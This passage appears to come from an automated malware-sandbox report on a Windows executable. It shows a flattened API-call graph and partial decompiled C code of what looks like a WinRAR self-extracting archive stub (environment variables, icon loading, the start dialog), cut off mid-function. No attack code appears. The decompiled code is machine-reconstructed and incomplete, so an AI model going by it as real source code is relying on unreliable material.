23497 3efbbc CatchGuardHandler 5 API calls 23499 3f8ae9 23497->23499 23498->23497 23499->23465 23500->23467 23501->23470 23624 3e0863 23502->23624 23506 3edf3d 23673 3eac16 23506->23673 23508 3edf46 __cftof 23509 3edf59 GetCommandLineW 23508->23509 23510 3edf68 23509->23510 23511 3edfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23509->23511 
23710 3ec5c4 83 API calls 23510->23710 23677 3d4092 23511->23677 23515 3edf6e 23517 3edf76 OpenFileMappingW 23515->23517 23518 3edfe0 23515->23518 23521 3edf8f MapViewOfFile 23517->23521 23522 3edfd6 CloseHandle 23517->23522 23712 3edbde SetEnvironmentVariableW SetEnvironmentVariableW 23518->23712 23524 3edfcd UnmapViewOfFile 23521->23524 23525 3edfa0 __InternalCxxFrameHandler 23521->23525 23522->23511 23524->23522 23711 3edbde SetEnvironmentVariableW SetEnvironmentVariableW 23525->23711 23530 3e90b7 8 API calls 23532 3ee0aa DialogBoxParamW 23530->23532 23531 3edfbc 23531->23524 23533 3ee0e4 23532->23533 23534 3ee0fd 23533->23534 23535 3ee0f6 Sleep 23533->23535 23537 3ee10b 23534->23537 23713 3eae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23534->23713 23535->23534 23538 3ee12a DeleteObject 23537->23538 23539 3ee13f DeleteObject 23538->23539 23540 3ee146 23538->23540 23539->23540 23541 3ee189 23540->23541 23542 3ee177 23540->23542 23707 3eac7c 23541->23707 23714 3edc3b 6 API calls 23542->23714 23544 3ee17d CloseHandle 23544->23541 23546 3ee1c3 23551 3ef993 GetModuleHandleW 23546->23551 24005 3f7cd5 23547->24005 23550->23471 23551->23475 23552->23477 23553->23480 23554->23455 23556->23484 23569 3f3b07 23557->23569 23560 3f2a67 23560->23486 23562 3f2a6f 23563 3f2a7a 23562->23563 23583 3f3b43 DeleteCriticalSection 23562->23583 23563->23486 23612 3fc05a 23565->23612 23568 3f2a7d 7 API calls 2 library calls 23568->23487 23571 3f3b10 23569->23571 23572 3f3b39 23571->23572 23573 3f2a63 23571->23573 23584 3f3d46 23571->23584 23589 3f3b43 DeleteCriticalSection 23572->23589 23573->23560 23575 3f2b8c 23573->23575 23605 3f3c57 23575->23605 23579 3f2bbc 23579->23562 23580 3f2baf 23580->23579 23611 3f2bbf 6 API calls ___vcrt_FlsFree 23580->23611 23582 3f2ba1 23582->23562 23583->23560 23590 3f3c0d 23584->23590 23587 3f3d7e InitializeCriticalSectionAndSpinCount 23588 3f3d69 23587->23588 23588->23571 23589->23573 23591 3f3c26 23590->23591 23594 3f3c4f 23590->23594 
23591->23594 23597 3f3b72 23591->23597 23594->23587 23594->23588 23595 3f3c3b GetProcAddress 23595->23594 23596 3f3c49 23595->23596 23596->23594 23598 3f3b7e ___vcrt_FlsSetValue 23597->23598 23599 3f3bf3 23598->23599 23600 3f3b95 LoadLibraryExW 23598->23600 23604 3f3bd5 LoadLibraryExW 23598->23604 23599->23594 23599->23595 23601 3f3bfa 23600->23601 23602 3f3bb3 GetLastError 23600->23602 23601->23599 23603 3f3c02 FreeLibrary 23601->23603 23602->23598 23603->23599 23604->23598 23604->23601 23606 3f3c0d ___vcrt_FlsSetValue 5 API calls 23605->23606 23607 3f3c71 23606->23607 23608 3f3c8a TlsAlloc 23607->23608 23609 3f2b96 23607->23609 23609->23582 23610 3f3d08 6 API calls ___vcrt_FlsSetValue 23609->23610 23610->23580 23611->23582 23615 3fc073 23612->23615 23614 3eeefe 23614->23490 23614->23568 23616 3efbbc 23615->23616 23617 3efbc4 23616->23617 23618 3efbc5 IsProcessorFeaturePresent 23616->23618 23617->23614 23620 3efc07 23618->23620 23623 3efbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23620->23623 23622 3efcea 23622->23614 23623->23622 23715 3eec50 23624->23715 23627 3e0888 GetProcAddress 23630 3e08b9 GetProcAddress 23627->23630 23631 3e08a1 23627->23631 23628 3e08e7 23629 3e0c14 GetModuleFileNameW 23628->23629 23726 3f75fb 42 API calls 2 library calls 23628->23726 23632 3e0c32 23629->23632 23636 3e08cb 23630->23636 23631->23630 23643 3e0c94 GetFileAttributesW 23632->23643 23644 3e0cac 23632->23644 23646 3e0c5d CompareStringW 23632->23646 23717 3db146 23632->23717 23720 3e081b 23632->23720 23634 3e0b54 23634->23629 23635 3e0b5f GetModuleFileNameW CreateFileW 23634->23635 23637 3e0b8f SetFilePointer 23635->23637 23638 3e0c08 CloseHandle 23635->23638 23636->23628 23637->23638 23639 3e0b9d ReadFile 23637->23639 23638->23629 23639->23638 23641 3e0bbb 23639->23641 23641->23638 23645 3e081b 2 API calls 23641->23645 23643->23632 23643->23644 23647 3e0cb7 23644->23647 23650 3e0cec 23644->23650 23645->23641 23646->23632 23649 
3e0cd0 GetFileAttributesW 23647->23649 23652 3e0ce8 23647->23652 23648 3e0dfb 23672 3ea64d GetCurrentDirectoryW 23648->23672 23649->23647 23649->23652 23650->23648 23651 3db146 GetVersionExW 23650->23651 23653 3e0d06 23651->23653 23652->23650 23654 3e0d0d 23653->23654 23655 3e0d73 23653->23655 23657 3e081b 2 API calls 23654->23657 23656 3d4092 _swprintf 51 API calls 23655->23656 23658 3e0d9b AllocConsole 23656->23658 23659 3e0d17 23657->23659 23660 3e0da8 GetCurrentProcessId AttachConsole 23658->23660 23661 3e0df3 ExitProcess 23658->23661 23662 3e081b 2 API calls 23659->23662 23731 3f3e13 23660->23731 23664 3e0d21 23662->23664 23727 3de617 23664->23727 23665 3e0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23665->23661 23668 3d4092 _swprintf 51 API calls 23669 3e0d4f 23668->23669 23670 3de617 53 API calls 23669->23670 23671 3e0d5e 23670->23671 23671->23661 23672->23506 23674 3e081b 2 API calls 23673->23674 23675 3eac2a OleInitialize 23674->23675 23676 3eac4d GdiplusStartup SHGetMalloc 23675->23676 23676->23508 23756 3d4065 23677->23756 23680 3eb6dd LoadBitmapW 23681 3eb6fe 23680->23681 23682 3eb70b GetObjectW 23680->23682 23833 3ea6c2 FindResourceW 23681->23833 23684 3eb71a 23682->23684 23828 3ea5c6 23684->23828 23687 3eb770 23699 3dda42 23687->23699 23689 3eb74c 23847 3ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23689->23847 23690 3ea6c2 12 API calls 23692 3eb73d 23690->23692 23692->23689 23694 3eb743 DeleteObject 23692->23694 23693 3eb754 23848 3ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23693->23848 23694->23689 23696 3eb75d 23849 3ea80c 8 API calls 23696->23849 23698 3eb764 DeleteObject 23698->23687 23860 3dda67 23699->23860 23704 3e90b7 23993 3eeb38 23704->23993 23708 3eacab GdiplusShutdown OleUninitialize 23707->23708 23708->23546 23710->23515 23711->23531 23712->23511 23713->23537 23714->23544 23716 3e086d GetModuleHandleW 23715->23716 23716->23627 23716->23628 23718 3db15a GetVersionExW 23717->23718 23719 3db196 23717->23719 23718->23719 
23719->23632 23721 3eec50 23720->23721 23722 3e0828 GetSystemDirectoryW 23721->23722 23723 3e085e 23722->23723 23724 3e0840 23722->23724 23723->23632 23725 3e0851 LoadLibraryW 23724->23725 23725->23723 23726->23634 23728 3de627 23727->23728 23733 3de648 23728->23733 23732 3f3e1b 23731->23732 23732->23665 23732->23732 23739 3dd9b0 23733->23739 23736 3de66b LoadStringW 23737 3de645 23736->23737 23738 3de682 LoadStringW 23736->23738 23737->23668 23738->23737 23744 3dd8ec 23739->23744 23741 3dd9cd 23742 3dd9e2 23741->23742 23752 3dd9f0 26 API calls 23741->23752 23742->23736 23742->23737 23745 3dd904 23744->23745 23751 3dd984 _strncpy 23744->23751 23747 3dd928 23745->23747 23753 3e1da7 WideCharToMultiByte 23745->23753 23750 3dd959 23747->23750 23754 3de5b1 50 API calls __vsnprintf 23747->23754 23755 3f6159 26 API calls 3 library calls 23750->23755 23751->23741 23752->23742 23753->23747 23754->23750 23755->23751 23757 3d407c __vswprintf_c_l 23756->23757 23760 3f5fd4 23757->23760 23763 3f4097 23760->23763 23764 3f40bf 23763->23764 23766 3f40d7 23763->23766 23780 3f91a8 20 API calls _abort 23764->23780 23765 3f40df 23782 3f4636 23765->23782 23766->23764 23766->23765 23769 3f40c4 23781 3f9087 26 API calls __cftof 23769->23781 23773 3efbbc CatchGuardHandler 5 API calls 23775 3d4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23773->23775 23774 3f4167 23791 3f49e6 51 API calls 4 library calls 23774->23791 23775->23680 23778 3f4172 23792 3f46b9 20 API calls _free 23778->23792 23779 3f40cf 23779->23773 23780->23769 23781->23779 23783 3f4653 23782->23783 23784 3f40ef 23782->23784 23783->23784 23793 3f97e5 GetLastError 23783->23793 23790 3f4601 20 API calls 2 library calls 23784->23790 23786 3f4674 23814 3f993a 38 API calls __fassign 23786->23814 23788 3f468d 23815 3f9967 38 API calls __fassign 23788->23815 23790->23774 23791->23778 23792->23779 23794 3f97fb 23793->23794 23795 3f9807 23793->23795 23816 3fae5b 11 API calls 2 library calls 23794->23816 23817 3fb136 20 API 
calls 2 library calls 23795->23817 23798 3f9801 23798->23795 23800 3f9850 SetLastError 23798->23800 23799 3f9813 23805 3f981b 23799->23805 23824 3faeb1 11 API calls 2 library calls 23799->23824 23800->23786 23802 3f9830 23804 3f9837 23802->23804 23802->23805 23825 3f9649 20 API calls _abort 23804->23825 23818 3f8dcc 23805->23818 23806 3f9821 23807 3f985c SetLastError 23806->23807 23826 3f8d24 38 API calls _abort 23807->23826 23809 3f9842 23811 3f8dcc _free 20 API calls 23809->23811 23813 3f9849 23811->23813 23813->23800 23813->23807 23814->23788 23815->23784 23816->23798 23817->23799 23819 3f8dd7 RtlFreeHeap 23818->23819 23820 3f8e00 _free 23818->23820 23819->23820 23821 3f8dec 23819->23821 23820->23806 23827 3f91a8 20 API calls _abort 23821->23827 23823 3f8df2 GetLastError 23823->23820 23824->23802 23825->23809 23827->23823 23850 3ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23828->23850 23830 3ea5cd 23831 3ea5d9 23830->23831 23851 3ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23830->23851 23831->23687 23831->23689 23831->23690 23834 3ea7d3 23833->23834 23835 3ea6e5 SizeofResource 23833->23835 23834->23682 23834->23684 23835->23834 23836 3ea6fc LoadResource 23835->23836 23836->23834 23837 3ea711 LockResource 23836->23837 23837->23834 23838 3ea722 GlobalAlloc 23837->23838 23838->23834 23839 3ea73d GlobalLock 23838->23839 23840 3ea7cc GlobalFree 23839->23840 23841 3ea74c __InternalCxxFrameHandler 23839->23841 23840->23834 23842 3ea7c5 GlobalUnlock 23841->23842 23852 3ea626 GdipAlloc 23841->23852 23842->23840 23845 3ea79a GdipCreateHBITMAPFromBitmap 23846 3ea7b0 23845->23846 23846->23842 23847->23693 23848->23696 23849->23698 23850->23830 23851->23831 23853 3ea638 23852->23853 23854 3ea645 23852->23854 23856 3ea3b9 23853->23856 23854->23842 23854->23845 23854->23846 23857 3ea3da GdipCreateBitmapFromStreamICM 23856->23857 23858 3ea3e1 GdipCreateBitmapFromStream 23856->23858 23859 3ea3e6 23857->23859 23858->23859 23859->23854 23861 3dda75 _wcschr __EH_prolog 
23860->23861 23862 3ddaa4 GetModuleFileNameW 23861->23862 23863 3ddad5 23861->23863 23864 3ddabe 23862->23864 23906 3d98e0 23863->23906 23864->23863 23866 3ddb31 23917 3f6310 23866->23917 23868 3de261 78 API calls 23871 3ddb05 23868->23871 23871->23866 23871->23868 23884 3ddd4a 23871->23884 23872 3ddb44 23873 3f6310 26 API calls 23872->23873 23881 3ddb56 ___vcrt_FlsSetValue 23873->23881 23874 3ddc85 23874->23884 23953 3d9d70 81 API calls 23874->23953 23878 3ddc9f ___std_exception_copy 23879 3d9bd0 82 API calls 23878->23879 23878->23884 23882 3ddcc8 ___std_exception_copy 23879->23882 23881->23874 23881->23884 23931 3d9e80 23881->23931 23947 3d9bd0 23881->23947 23952 3d9d70 81 API calls 23881->23952 23882->23884 23901 3ddcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 23882->23901 23954 3e1b84 MultiByteToWideChar 23882->23954 23940 3d959a 23884->23940 23885 3de159 23890 3de1de 23885->23890 23960 3f8cce 26 API calls 2 library calls 23885->23960 23888 3de16e 23961 3f7625 26 API calls 2 library calls 23888->23961 23889 3de1c6 23962 3de27c 78 API calls 23889->23962 23891 3de214 23890->23891 23894 3de261 78 API calls 23890->23894 23895 3f6310 26 API calls 23891->23895 23894->23890 23896 3de22d 23895->23896 23897 3f6310 26 API calls 23896->23897 23897->23884 23900 3e1da7 WideCharToMultiByte 23900->23901 23901->23884 23901->23885 23901->23900 23955 3de5b1 50 API calls __vsnprintf 23901->23955 23956 3f6159 26 API calls 3 library calls 23901->23956 23957 3f8cce 26 API calls 2 library calls 23901->23957 23958 3f7625 26 API calls 2 library calls 23901->23958 23959 3de27c 78 API calls 23901->23959 23904 3de29e GetModuleHandleW FindResourceW 23905 3dda55 23904->23905 23905->23704 23907 3d98ea 23906->23907 23908 3d994b CreateFileW 23907->23908 23909 3d996c GetLastError 23908->23909 23913 3d99bb 23908->23913 23963 3dbb03 23909->23963 23911 3d998c 23911->23913 23914 3d9990 CreateFileW GetLastError 23911->23914 23912 3d99ff 23912->23871 23913->23912 23915 3d99e5 SetFileTime 
23913->23915 23914->23913 23916 3d99b5 23914->23916 23915->23912 23916->23913 23918 3f6349 23917->23918 23919 3f634d 23918->23919 23930 3f6375 23918->23930 23967 3f91a8 20 API calls _abort 23919->23967 23921 3f6352 23968 3f9087 26 API calls __cftof 23921->23968 23922 3f6699 23924 3efbbc CatchGuardHandler 5 API calls 23922->23924 23926 3f66a6 23924->23926 23925 3f635d 23927 3efbbc CatchGuardHandler 5 API calls 23925->23927 23926->23872 23929 3f6369 23927->23929 23929->23872 23930->23922 23969 3f6230 5 API calls CatchGuardHandler 23930->23969 23932 3d9ea5 23931->23932 23933 3d9e92 23931->23933 23934 3d9eb0 23932->23934 23936 3d9eb8 SetFilePointer 23932->23936 23933->23934 23970 3d6d5b 77 API calls 23933->23970 23934->23881 23936->23934 23937 3d9ed4 GetLastError 23936->23937 23937->23934 23938 3d9ede 23937->23938 23938->23934 23971 3d6d5b 77 API calls 23938->23971 23941 3d95be 23940->23941 23942 3d95cf 23940->23942 23941->23942 23943 3d95ca 23941->23943 23944 3d95d1 23941->23944 23942->23904 23972 3d974e 23943->23972 23977 3d9620 23944->23977 23948 3d9bdc 23947->23948 23950 3d9be3 23947->23950 23948->23881 23950->23948 23951 3d9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23950->23951 23992 3d6d1a 77 API calls 23950->23992 23951->23950 23952->23881 23953->23878 23954->23901 23955->23901 23956->23901 23957->23901 23958->23901 23959->23901 23960->23888 23961->23889 23962->23890 23964 3dbb10 _wcslen 23963->23964 23965 3dbbb8 GetCurrentDirectoryW 23964->23965 23966 3dbb39 _wcslen 23964->23966 23965->23966 23966->23911 23967->23921 23968->23925 23969->23930 23970->23932 23971->23934 23973 3d9781 23972->23973 23976 3d9757 23972->23976 23973->23942 23976->23973 23983 3da1e0 23976->23983 23978 3d962c 23977->23978 23979 3d964a 23977->23979 23978->23979 23981 3d9638 FindCloseChangeNotification 23978->23981 23980 3d9669 23979->23980 23991 3d6bd5 76 API calls 23979->23991 23980->23942 23981->23979 23984 3eec50 23983->23984 23985 3da1ed DeleteFileW 23984->23985 
23986 3d977f 23985->23986 23987 3da200 23985->23987 23986->23942 23988 3dbb03 GetCurrentDirectoryW 23987->23988 23989 3da214 23988->23989 23989->23986 23990 3da218 DeleteFileW 23989->23990 23990->23986 23991->23980 23992->23950 23994 3eeb3d ___std_exception_copy 23993->23994 23995 3e90d6 23994->23995 23998 3eeb59 23994->23998 24002 3f7a5e 7 API calls 2 library calls 23994->24002 23995->23530 23997 3ef5c9 24004 3f238d RaiseException 23997->24004 23998->23997 24003 3f238d RaiseException 23998->24003 24000 3ef5e6 24002->23994 24003->23997 24004->24000 24006 3f7ce1 _abort 24005->24006 24007 3f7cfa 24006->24007 24008 3f7ce8 24006->24008 24029 3fac31 EnterCriticalSection 24007->24029 24041 3f7e2f GetModuleHandleW 24008->24041 24011 3f7ced 24011->24007 24042 3f7e73 GetModuleHandleExW 24011->24042 24012 3f7d9f 24030 3f7ddf 24012->24030 24017 3f7d76 24018 3f7d8e 24017->24018 24023 3f8a91 _abort 5 API calls 24017->24023 24024 3f8a91 _abort 5 API calls 24018->24024 24019 3f7d01 24019->24012 24019->24017 24050 3f87e0 20 API calls _abort 24019->24050 24020 3f7dbc 24033 3f7dee 24020->24033 24021 3f7de8 24051 402390 5 API calls CatchGuardHandler 24021->24051 24023->24018 24024->24012 24029->24019 24052 3fac81 LeaveCriticalSection 24030->24052 24032 3f7db8 24032->24020 24032->24021 24053 3fb076 24033->24053 24036 3f7e1c 24039 3f7e73 _abort 8 API calls 24036->24039 24037 3f7dfc GetPEB 24037->24036 24038 3f7e0c GetCurrentProcess TerminateProcess 24037->24038 24038->24036 24040 3f7e24 ExitProcess 24039->24040 24041->24011 24043 3f7e9d GetProcAddress 24042->24043 24044 3f7ec0 24042->24044 24047 3f7eb2 24043->24047 24045 3f7ecf 24044->24045 24046 3f7ec6 FreeLibrary 24044->24046 24048 3efbbc CatchGuardHandler 5 API calls 24045->24048 24046->24045 24047->24044 24049 3f7cf9 24048->24049 24049->24007 24050->24017 24052->24032 24054 3fb09b 24053->24054 24058 3fb091 24053->24058 24059 3fac98 24054->24059 24056 3efbbc CatchGuardHandler 5 API calls 24057 3f7df8 24056->24057 24057->24036 
24057->24037 24058->24056 24060 3facc4 24059->24060 24061 3facc8 24059->24061 24060->24061 24065 3face8 24060->24065 24066 3fad34 24060->24066 24061->24058 24063 3facf4 GetProcAddress 24064 3fad04 _abort 24063->24064 24064->24061 24065->24061 24065->24063 24067 3fad55 LoadLibraryExW 24066->24067 24068 3fad4a 24066->24068 24069 3fad8a 24067->24069 24070 3fad72 GetLastError 24067->24070 24068->24060 24069->24068 24072 3fada1 FreeLibrary 24069->24072 24070->24069 24071 3fad7d LoadLibraryExW 24070->24071 24071->24069 24072->24068 25430 3eb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24073 3ee5b1 24074 3ee578 24073->24074 24076 3ee85d 24074->24076 24102 3ee5bb 24076->24102 24078 3ee86d 24079 3ee8ee 24078->24079 24080 3ee8ca 24078->24080 24083 3ee966 LoadLibraryExA 24079->24083 24085 3ee9c7 24079->24085 24086 3ee9d9 24079->24086 24097 3eea95 24079->24097 24081 3ee7fb DloadReleaseSectionWriteAccess 6 API calls 24080->24081 24082 3ee8d5 RaiseException 24081->24082 24098 3eeac3 24082->24098 24084 3ee979 GetLastError 24083->24084 24083->24085 24087 3ee98c 24084->24087 24088 3ee9a2 24084->24088 24085->24086 24090 3ee9d2 FreeLibrary 24085->24090 24089 3eea37 GetProcAddress 24086->24089 24086->24097 24087->24085 24087->24088 24091 3ee7fb DloadReleaseSectionWriteAccess 6 API calls 24088->24091 24092 3eea47 GetLastError 24089->24092 24089->24097 24090->24086 24093 3ee9ad RaiseException 24091->24093 24094 3eea5a 24092->24094 24093->24098 24096 3ee7fb DloadReleaseSectionWriteAccess 6 API calls 24094->24096 24094->24097 24099 3eea7b RaiseException 24096->24099 24111 3ee7fb 24097->24111 24098->24074 24100 3ee5bb ___delayLoadHelper2@8 6 API calls 24099->24100 24101 3eea92 24100->24101 24101->24097 24103 3ee5ed 24102->24103 24104 3ee5c7 24102->24104 24103->24078 24119 3ee664 24104->24119 24106 3ee5cc 24107 3ee5e8 24106->24107 24122 3ee78d 24106->24122 24127 3ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24107->24127 24110 3ee836 24110->24078 24112 3ee82f 24111->24112 
24113 3ee80d 24111->24113 24112->24098 24114 3ee664 DloadReleaseSectionWriteAccess 3 API calls 24113->24114 24115 3ee812 24114->24115 24116 3ee82a 24115->24116 24117 3ee78d DloadProtectSection 3 API calls 24115->24117 24130 3ee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24116->24130 24117->24116 24128 3ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24119->24128 24121 3ee669 24121->24106 24124 3ee7a2 DloadProtectSection 24122->24124 24123 3ee7a8 24123->24107 24124->24123 24125 3ee7dd VirtualProtect 24124->24125 24129 3ee6a3 VirtualQuery GetSystemInfo 24124->24129 24125->24123 24127->24110 24128->24121 24129->24125 24130->24112 25432 402bd0 VariantClear 25434 3d6faa 111 API calls 3 library calls 25435 3eeda7 48 API calls _unexpected 24271 3ef3a0 24276 3ef9d5 SetUnhandledExceptionFilter 24271->24276 24273 3ef3a5 24277 3f8c3a 26 API calls 2 library calls 24273->24277 24275 3ef3b0 24276->24273 24277->24275 25386 3fa4a0 71 API calls _free 25387 3edca1 DialogBoxParamW 25388 3fa6a0 31 API calls 2 library calls 25436 3eb18d 78 API calls 25390 3ec793 97 API calls 4 library calls 25391 3ec793 102 API calls 5 library calls 25439 3e9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25393 3f2cfb 38 API calls 4 library calls 25395 3d5ef0 82 API calls 25441 3d95f0 80 API calls 24320 3f98f0 24328 3fadaf 24320->24328 24323 3f9904 24325 3f990c 24326 3f9919 24325->24326 24336 3f9920 11 API calls 24325->24336 24329 3fac98 _abort 5 API calls 24328->24329 24330 3fadd6 24329->24330 24331 3fadee TlsAlloc 24330->24331 24332 3faddf 24330->24332 24331->24332 24333 3efbbc CatchGuardHandler 5 API calls 24332->24333 24334 3f98fa 24333->24334 24334->24323 24335 3f9869 20 API calls 2 library calls 24334->24335 24335->24325 24336->24323 24337 3fabf0 24338 3fabfb 24337->24338 24340 3fac24 24338->24340 24342 3fac20 24338->24342 24343 3faf0a 24338->24343 24350 3fac50 DeleteCriticalSection 24340->24350 24344 3fac98 _abort 5 API 
calls 24343->24344 24345 3faf31 24344->24345 24346 3faf4f InitializeCriticalSectionAndSpinCount 24345->24346 24347 3faf3a 24345->24347 24346->24347 24348 3efbbc CatchGuardHandler 5 API calls 24347->24348 24349 3faf66 24348->24349 24349->24338 24350->24342 25396 3f88f0 7 API calls ___scrt_uninitialize_crt 25443 3efd4f 9 API calls 2 library calls 25445 3df1e8 FreeLibrary 24357 3eeae7 24358 3eeaf1 24357->24358 24359 3ee85d ___delayLoadHelper2@8 14 API calls 24358->24359 24360 3eeafe 24359->24360 25397 3ef4e7 29 API calls _abort 24362 3d13e1 84 API calls 2 library calls 24363 3eb7e0 24364 3eb7ea __EH_prolog 24363->24364 24531 3d1316 24364->24531 24367 3eb841 24368 3ebf0f 24596 3ed69e 24368->24596 24369 3eb82a 24369->24367 24371 3eb89b 24369->24371 24372 3eb838 24369->24372 24378 3eb92e GetDlgItemTextW 24371->24378 24382 3eb8b1 24371->24382 24374 3eb83c 24372->24374 24375 3eb878 24372->24375 24374->24367 24384 3de617 53 API calls 24374->24384 24375->24367 24386 3eb95f EndDialog 24375->24386 24376 3ebf2a SendMessageW 24377 3ebf38 24376->24377 24379 3ebf52 GetDlgItem SendMessageW 24377->24379 24380 3ebf41 SendDlgItemMessageW 24377->24380 24378->24375 24381 3eb96b 24378->24381 24614 3ea64d GetCurrentDirectoryW 24379->24614 24380->24379 24387 3eb980 GetDlgItem 24381->24387 24529 3eb974 24381->24529 24383 3de617 53 API calls 24382->24383 24390 3eb8ce SetDlgItemTextW 24383->24390 24391 3eb85b 24384->24391 24386->24367 24388 3eb9b7 SetFocus 24387->24388 24389 3eb994 SendMessageW SendMessageW 24387->24389 24393 3eb9c7 24388->24393 24408 3eb9e0 24388->24408 24389->24388 24394 3eb8d9 24390->24394 24634 3d124f SHGetMalloc 24391->24634 24392 3ebf82 GetDlgItem 24396 3ebf9f 24392->24396 24397 3ebfa5 SetWindowTextW 24392->24397 24398 3de617 53 API calls 24393->24398 24394->24367 24402 3eb8e6 GetMessageW 24394->24402 24396->24397 24615 3eabab GetClassNameW 24397->24615 24403 3eb9d1 24398->24403 24399 3eb862 24399->24367 24409 3ec1fc SetDlgItemTextW 24399->24409 24400 3ebe55 24404 
3de617 53 API calls 24400->24404 24402->24367 24406 3eb8fd IsDialogMessageW 24402->24406 24635 3ed4d4 24403->24635 24410 3ebe65 SetDlgItemTextW 24404->24410 24406->24394 24412 3eb90c TranslateMessage DispatchMessageW 24406->24412 24415 3de617 53 API calls 24408->24415 24409->24367 24413 3ebe79 24410->24413 24412->24394 24416 3de617 53 API calls 24413->24416 24418 3eba17 24415->24418 24452 3ebe9c _wcslen 24416->24452 24417 3ebff0 24421 3ec020 24417->24421 24424 3de617 53 API calls 24417->24424 24423 3d4092 _swprintf 51 API calls 24418->24423 24419 3ec73f 97 API calls 24419->24417 24420 3eb9d9 24541 3da0b1 24420->24541 24432 3ec73f 97 API calls 24421->24432 24475 3ec0d8 24421->24475 24426 3eba29 24423->24426 24429 3ec003 SetDlgItemTextW 24424->24429 24428 3ed4d4 16 API calls 24426->24428 24427 3ec18b 24433 3ec19d 24427->24433 24434 3ec194 EnableWindow 24427->24434 24428->24420 24436 3de617 53 API calls 24429->24436 24430 3eba73 24547 3eac04 SetCurrentDirectoryW 24430->24547 24431 3eba68 GetLastError 24431->24430 24438 3ec03b 24432->24438 24439 3ec1ba 24433->24439 24653 3d12d3 GetDlgItem EnableWindow 24433->24653 24434->24433 24435 3ebeed 24442 3de617 53 API calls 24435->24442 24440 3ec017 SetDlgItemTextW 24436->24440 24448 3ec04d 24438->24448 24472 3ec072 24438->24472 24445 3ec1e1 24439->24445 24456 3ec1d9 SendMessageW 24439->24456 24440->24421 24441 3eba87 24446 3eba90 GetLastError 24441->24446 24447 3eba9e 24441->24447 24442->24367 24443 3ec0cb 24453 3ec73f 97 API calls 24443->24453 24445->24367 24457 3de617 53 API calls 24445->24457 24446->24447 24449 3ebb11 24447->24449 24458 3ebaae GetTickCount 24447->24458 24459 3ebb20 24447->24459 24651 3e9ed5 32 API calls 24448->24651 24449->24459 24461 3ebd56 24449->24461 24451 3ec1b0 24654 3d12d3 GetDlgItem EnableWindow 24451->24654 24452->24435 24460 3de617 53 API calls 24452->24460 24453->24475 24454 3ec066 24454->24472 24456->24445 24457->24399 24465 3d4092 _swprintf 51 API calls 24458->24465 24462 3ebb39 

                Control-flow Graph

                C-Code - Quality: 17%
                			E003EDF1E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
                				char _v208;
                				void* __ebx;
                				void* __edi;
                				void* _t40;
                				void* _t41;
                				long _t50;
                				void* _t53;
                				intOrPtr _t57;
                				struct HWND__* _t73;
                				void* _t74;
                				WCHAR* _t92;
                				struct HINSTANCE__* _t93;
                				intOrPtr _t94;
                				void* _t98;
                				void* _t100;
                				void* _t101;
                				void* _t102;
                				void* _t120;
                
                				_t120 = __fp0;
                				_t86 = __edx;
                				E003E0863(__edx, 1);
                				E003EA64D("C:\Users\frontdesk\Desktop", 0x800);
                				_t75 =  &_v208;
                				E003EAC16( &_v208); // executed
                				_t73 = 0;
                				E003EFFF0(0x7104, 0x427b80, 0, 0x7104);
                				_t101 = _t100 + 0xc;
                				_t92 = GetCommandLineW();
                				_t105 = _t92;
                				if(_t92 != 0) {
                					_push(_t92);
                					E003EC5C4(0, _t105);
                					if( *0x41a471 == 0) {
                						E003EDBDE(__eflags, _t92);
                					} else {
                						_t98 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
                						if(_t98 != 0) {
                							UnmapViewOfFile(_t74);
                							_t73 = 0;
                						}
                						CloseHandle(_t98);
                					}
                				}
                				GetModuleFileNameW(_t73, 0x42ec90, 0x800);
                				SetEnvironmentVariableW(L"sfxname", 0x42ec90); // executed
                				GetLocalTime(_t101 + 0xc);
                				_push( *(_t101 + 0x1a) & 0x0000ffff);
                				_push( *(_t101 + 0x1c) & 0x0000ffff);
                				_push( *(_t101 + 0x1e) & 0x0000ffff);
                				_push( *(_t101 + 0x20) & 0x0000ffff);
                				_push( *(_t101 + 0x22) & 0x0000ffff);
                				_push( *(_t101 + 0x22) & 0x0000ffff);
                				E003D4092(_t101 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t101 + 0x24) & 0x0000ffff);
                				_t102 = _t101 + 0x28;
                				SetEnvironmentVariableW(L"sfxstime", _t102 + 0x7c);
                				_t93 = GetModuleHandleW(_t73);
                				 *0x41102c = _t93;
                				 *0x411028 = _t93; // executed
                				_t40 = LoadIconW(_t93, 0x64); // executed
                				 *0x427b7c = _t40; // executed
                				_t41 = E003EB6DD(_t75, _t86, _t120); // executed
                				 *0x42ec84 = _t41;
                				E003DDA42(0x411030, _t86, 0, 0x42ec90);
                				E003E90B7(0);
                				E003E90B7(0);
                				 *0x418440 = _t102 + 0x5c;
                				 *0x418444 = _t102 + 0x30; // executed
                				DialogBoxParamW(_t93, L"STARTDLG", _t73, E003EB7E0, _t73); // executed
                				 *0x418444 = _t73;
                				 *0x418440 = _t73;
                				E003E9178(_t102 + 0x24);
                				E003E9178(_t102 + 0x50);
                				_t50 =  *0x42fca8;
                				if(_t50 != 0) {
                					Sleep(_t50);
                				}
                				if( *0x419468 != 0) {
                					E003EAE2F(0x42ec90);
                				}
                				E003DF279(0x427a78);
                				if( *0x42fca0 > 0) {
                					L003EEE5C( *0x42fc90);
                				}
                				DeleteObject( *0x427b7c);
                				_t53 =  *0x42ec84;
                				if(_t53 != 0) {
                					DeleteObject(_t53);
